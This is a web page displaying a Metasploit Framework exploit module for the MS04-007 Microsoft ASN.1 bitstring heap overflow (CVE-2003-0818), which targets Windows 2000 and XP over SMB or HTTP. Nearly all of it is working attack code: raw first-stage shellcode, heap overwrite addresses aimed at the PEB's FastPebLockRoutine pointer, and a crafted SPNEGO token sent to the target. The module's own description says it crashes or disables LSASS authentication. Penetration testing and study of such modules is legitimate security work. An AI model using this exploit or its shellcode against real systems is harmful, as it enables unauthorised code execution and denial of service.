Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms04_007_killbill.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = LowRanking
8
9
include Msf::Exploit::Remote::SMB::Client
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow',
16
'Description' => %q{
17
This is an exploit for a previously undisclosed
18
vulnerability in the bit string decoding code in the
19
Microsoft ASN.1 library. This vulnerability is not related
20
to the bit string vulnerability described in eEye advisory
21
AD20040210-2. Both vulnerabilities were fixed in the
22
MS04-007 patch. Windows 2000 SP4 Rollup 1 also patches this
23
vulnerability.
24
25
You are only allowed one attempt with this vulnerability. If
26
the payload fails to execute, the LSASS system service will
27
crash and the target system will automatically reboot itself
28
in 60 seconds. If the payload succeeds, the system will no
29
longer be able to process authentication requests, denying
30
all attempts to login through SMB or at the console. A
31
reboot is required to restore proper functioning of an
32
exploited system.
33
34
This exploit has been successfully tested with the win32/*/reverse_tcp
35
payloads, however a few problems were encountered when using the
36
equivalent bind payloads. Your mileage may vary.
37
},
38
'Author' => [ 'Solar Eclipse <solareclipse[at]phreedom.org>' ],
39
'License' => BSD_LICENSE,
40
'References' => [
41
[ 'CVE', '2003-0818'],
42
[ 'OSVDB', '3902' ],
43
[ 'BID', '9633'],
44
[ 'MSB', 'MS04-007'],
45
],
46
'DefaultOptions' => {
47
'EXITFUNC' => 'thread'
48
},
49
'Privileged' => true,
50
'Payload' => {
51
'Space' => 1024,
52
'StackAdjustment' => -3500,
53
},
54
'Platform' => 'win',
55
'Targets' => [
56
[
57
'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
58
{
59
'Platform' => 'win',
60
},
61
],
62
],
63
'Notes' => {
64
'AKA' => [ 'kill-bill' ],
65
'Reliability' => [ UNRELIABLE_SESSION ],
66
'Stability' => [ CRASH_OS_RESTARTS, CRASH_SERVICE_DOWN ],
67
'SideEffects' => UNKNOWN_SIDE_EFFECTS
68
},
69
'DisclosureDate' => '2004-02-10',
70
'DefaultTarget' => 0
71
)
72
)
73
74
register_options [
75
OptEnum.new('PROTO', [true, 'Which protocol to use', 'smb', %w[smb http]]),
76
]
77
78
deregister_options('SMB::ProtocolVersion')
79
end
80
81
# This exploit is too destructive to use during automated exploitation.
82
# Better Windows-based exploits exist at this time (Sep 2006)
83
def autofilter
84
false
85
end
86
87
# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
88
# as a Metasploit Framework module with his permission. This module is only
89
# licensed under GPLv2, keep this in mind if you embed the Framework into
90
# a non-GPL application. -hdm[at]metasploit.com
91
92
def exploit
93
# The first stage shellcode fixes the PEB pointer and cleans the heap
94
stage0 =
95
"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff" +
96
"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2" +
97
"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00" +
98
"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c" +
99
"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89" +
100
"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31" +
101
"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4" +
102
"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24" +
103
"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81" +
104
"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3" +
105
"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31" +
106
"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64" +
107
"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08" +
108
"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74" +
109
"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb" +
110
"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd" +
111
"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46" +
112
"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea" +
113
"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee" +
114
"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
115
"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b" +
116
"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2" +
117
"\x08\x00\xeb\xfe"
118
119
token = spnego_token(stage0, payload.encoded)
120
121
case datastore['PROTO']
122
when 'smb'
123
exploit_smb(token)
124
when 'http'
125
exploit_http(token)
126
else
127
print_status("Invalid application protocol specified, use smb or http")
128
end
129
end
130
131
def exploit_smb(token)
132
connect(versions: [1])
133
134
client = Rex::Proto::SMB::Client.new(sock)
135
136
begin
137
client.session_request(smb_hostname()) if not datastore['SMBDirect']
138
client.negotiate
139
client.session_setup_with_ntlmssp_blob(token)
140
rescue => e
141
if (e.to_s =~ /error code 0x00050001/)
142
print_error("The target system has already been exploited")
143
else
144
print_error("Error: #{e}")
145
end
146
end
147
148
handler
149
disconnect
150
end
151
152
def exploit_http(token)
153
connect(versions: [1])
154
155
req = "GET / HTTP/1.0\r\n"
156
req << "Host: #{datastore['RHOST']}\r\n"
157
req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"
158
159
sock.put(req)
160
res = sock.get_once
161
162
if (res and res =~ /0x80090301/)
163
print_error("This server does not support the Negotiate protocol or has already been exploited")
164
end
165
166
if (res and res =~ /0x80090304/)
167
print_error("This server responded with error code 0x80090304 (wth?)")
168
end
169
170
handler
171
disconnect
172
end
173
174
# Returns an ASN.1 encoded string
175
def enc_asn1(str)
176
Rex::Proto::NTLM::Utils::asn1encode(str)
177
end
178
179
# Returns an ASN.1 encoded bit string with 0 unused bits
180
def enc_bits(str)
181
"\x03" + enc_asn1("\x00" + str)
182
end
183
184
# Returns a BER encoded constructed bit string
185
def enc_constr(*str_arr)
186
"\x23" + enc_asn1(str_arr.join(''))
187
end
188
189
# Returns a BER encoded SPNEGO token
190
def spnego_token(stage0, stage1)
191
if !(stage0 and stage1)
192
print_status("Invalid parameters passed to spnego_token")
193
return
194
end
195
196
if (stage0.length > 1032)
197
print_status("The stage 0 shellcode is longer than 1032 bytes")
198
return
199
end
200
201
tag = "\x90\x42\x90\x42\x90\x42\x90\x42"
202
203
if ((tag.length + stage1.length) > 1033)
204
print_status("The stage 1 shellcode is too long")
205
return
206
end
207
208
# The first two overwrites must succeed, so we write to an unused location
209
# in the PEB block. We don't care about the values, because after this the
210
# doubly linked list of free blocks is corrupted and we get to the second
211
# overwrite which is more useful.
212
213
fw = "\xf8\x0f\x01\x00" # 0x00010ff8
214
bk = "\xf8\x0f\x01"
215
216
# The second overwrite writes the address of our shellcode into the
217
# FastPebLockRoutine pointer in the PEB
218
219
peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB
220
221
bitstring = enc_constr(
222
enc_bits("A" * 1024),
223
"\x03\x00",
224
enc_constr(
225
enc_bits(tag + stage1 + ("B" * (1033 - (tag + stage1).length))),
226
enc_constr(enc_bits(fw + bk)),
227
enc_constr(
228
enc_bits("CCCC" + peblock + stage0 + ("C" * (1032 - stage0.length))),
229
enc_constr(
230
enc_bits("\xeb\x06" + make_nops(6)),
231
enc_bits("D" * 1040)
232
)
233
)
234
)
235
)
236
237
token = "\x60" + enc_asn1( # Application Constructed Object
238
"\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID
239
"\xa0" + enc_asn1( # NegTokenInit (0xa0)
240
"\x30" + enc_asn1(
241
"\xa1" + enc_asn1(
242
bitstring
243
)
244
)
245
)
246
)
247
248
return token
249
end
250
end
251
252